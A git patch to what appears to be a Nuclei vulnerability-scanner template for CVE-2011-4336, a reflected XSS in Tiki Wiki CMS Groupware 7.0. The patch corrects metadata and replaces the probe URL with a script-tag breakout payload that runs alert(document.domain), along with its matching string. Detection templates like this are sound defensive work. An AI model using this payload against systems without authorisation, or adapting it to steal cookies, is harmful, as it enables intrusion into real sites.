From 7d0e2be80a7513662cc6a51c721675f45ef5246b Mon Sep 17 00:00:00 2001
From: Prince Chaddha <cyberbossprince@gmail.com>
Date: Mon, 2 Aug 2021 21:47:19 +0530
Subject: [PATCH] Update CVE-2011-4336.yaml

---
 cves/2011/CVE-2011-4336.yaml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/cves/2011/CVE-2011-4336.yaml b/cves/2011/CVE-2011-4336.yaml
index a6e4e66f47..8b0d597cec 100644
--- a/cves/2011/CVE-2011-4336.yaml
+++ b/cves/2011/CVE-2011-4336.yaml
@@ -1,7 +1,7 @@
 id: CVE-2011-4336
 
 info:
-  name: Tiki Wiki CMS Groupware 7.0 has  XSS
+  name: Tiki Wiki CMS Groupware 7.0 has XSS
   author: pikpikcu
   severity: medium
   description: Tiki Wiki CMS Groupware 7.0 has XSS via the GET "ajax" parameter to snarf_ajax.php.
@@ -9,18 +9,18 @@ info:
     - https://nvd.nist.gov/vuln/detail/CVE-2011-4336
     - https://www.securityfocus.com/bid/48806/info
     - https://seclists.org/bugtraq/2011/Nov/140
-  tags: cve,cve2011,xss,tiki-wiki
+  tags: cve,cve2011,xss,tikiwiki
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3Cscript%3Ealert%28document.cookie% 29;%3C/script%3E"
+      - "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - '<script>alert(document.domain);</script>'
+          - '</script><script>alert(document.domain)</script>'
         part: body
 
       - type: status